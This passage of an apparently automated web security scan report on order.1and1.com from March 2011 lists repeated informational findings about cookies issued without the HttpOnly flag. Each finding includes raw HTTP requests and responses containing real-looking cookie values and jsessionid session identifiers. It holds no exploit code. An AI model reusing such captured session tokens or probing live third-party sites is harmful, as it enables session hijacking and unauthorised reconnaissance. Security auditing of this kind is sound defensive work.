<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.93. http://order.1and1.com/xml/order/FeatureSite-buildingRss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingRss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingRss HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:42 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=413ff73ef856c000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingRss;jsessionid=00602F8FB6CF57D184916AE79D0856F4.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.94. http://order.1and1.com/xml/order/FeatureSite-buildingWsb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingWsb HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:41:34 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=140b368813868c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingWsb;jsessionid=CD7C8228BB49F109C2DA35CD8FAC2A5A.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.95. http://order.1and1.com/xml/order/FeatureSite-buildingWsb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:49 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:55:56 GMT; Path=/
ETag: 3664cb42dafe3db06f3ca98cf422ee72
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20579


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.96. http://order.1and1.com/xml/order/FeatureToolsRatepoint  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureToolsRatepoint

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureToolsRatepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:44:04 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=5729a5342aeda400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureToolsRatepoint;jsessionid=8B5621B53D25F04D97E2041EE345559D.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.97. http://order.1and1.com/xml/order/FeatureToolsRatepoint  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureToolsRatepoint

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureToolsRatepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:10 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=wZlsrLi8lTmVlX3JobzVtZzQmMGlcVi5FODIaHhsbMS8xLywsLy4oKy8iJCMiH0QyXlNVYxs0L184YnE3KisnJisnJSgmICgfHidfYD0yOWlyOCssKCcsKSYpJCcoISI=; Expires=Fri, 07-Apr-2079 21:58:17 GMT; Path=/
ETag: 340c020f5116b3d57c2a93a405b0dc63
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19172


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.98. http://order.1and1.com/xml/order/FeatureWebdesignIstock  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebdesignIstock

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureWebdesignIstock HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:07 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3348408536a8e000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureWebdesignIstock;jsessionid=B11825444DE6AF404D3894B75D9B481A.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.99. http://order.1and1.com/xml/order/FeatureWebdesignIstock  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebdesignIstock

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureWebdesignIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:12 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:57:19 GMT; Path=/
ETag: d06c6bfe7230ad5806d756546ea8b599
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17838


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.100. http://order.1and1.com/xml/order/FeatureWebspaceExplorer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebspaceExplorer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureWebspaceExplorer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:01 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=41597db82a3d3000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureWebspaceExplorer;jsessionid=93C56191AF30E78D44536F920C59ACBA.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.101. http://order.1and1.com/xml/order/FeatureWebspaceExplorer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebspaceExplorer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:11 GMT; Path=/
ETag: 1bb8645f85cd004134e2d01fcda6ff8b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17511


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.102. http://order.1and1.com/xml/order/FirstWebsite  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FirstWebsite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FirstWebsite;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:37 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=IdGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:51:45 GMT; Path=/
ETag: 2ed917d161c42e4fa75c784c5b6b5cf6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18487


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.103. http://order.1and1.com/xml/order/FirstWebsite  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FirstWebsite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FirstWebsite HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:37:34 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=721928ff566a0c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FirstWebsite;jsessionid=62AF947873737195114E013CF73D4E5F.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.104. http://order.1and1.com/xml/order/Gtc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:36:23 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMoL19oLiEiHh0iHxw2MTQ1Li8=; Expires=Fri, 07-Apr-2079 21:50:31 GMT; Path=/
ETag: c62c440b7a62cc8bf42d3668ecde986c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 119564


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.105. http://order.1and1.com/xml/order/Gtc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Gtc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
